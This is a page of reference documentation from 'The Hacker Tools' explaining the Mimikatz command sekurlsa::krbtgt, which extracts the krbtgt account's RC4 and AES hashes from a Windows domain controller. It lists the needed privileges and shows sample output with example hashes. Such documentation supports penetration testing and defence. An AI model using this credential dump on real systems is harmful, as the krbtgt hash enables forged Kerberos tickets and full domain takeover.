The Hacker Tools
GitHub
Twitter
The Hacker Recipes
Search…
Introduction
Mimikatz 🥝
General 🛠️
Modules
crypto
dpapi
event
kerberos
lsadump
misc
net
privilege
process
rpc
sekurlsa
backupkeys
bootkey
cloudap
credman
dpapi
dpapisystem
ekeys
kerberos
krbtgt
livessp
logonpasswords
minidump
msv
process
pth
ssp
tickets
trust
tspkg
wdigest
service
sid
standard
token
ts
vault
🛠️ Impacket
🛠️ CrackMapExec 🔱
🛠️ Exegol
Powered By
GitBook
krbtgt
sekurlsa::krbtgt
retrieves the krbtgt RC4 (i.e. NT hash), AES128 and AES256 hashes.
This command must be run on a domain controller
This command requires elevated privileges (by previously running
privilege::debug
or by executing Mimikatz as the
NT-AUTHORITY\SYSTEM
account).
1
mimikatz # sekurlsa::krbtgt
2
3
Current krbtgt: 5 credentials
4
* rc4_hmac_nt : b5348d0a20a24a67ff544146a09cd292
5
* rc4_hmac_old : b5348d0a20a24a67ff544146a09cd292
6
* rc4_md4 : b5348d0a20a24a67ff544146a09cd292
7
* aes256_hmac : 3ab45a59d37a5a647e0d7d9d942d0e8b77911cff0bd95b16e203cd9503ccdd96
8
* aes128_hmac : 3c8fc2890213fb9be3d6fb139b1be881
Copied!
Previous
kerberos
Next
livessp
Last modified
6mo ago
Copy link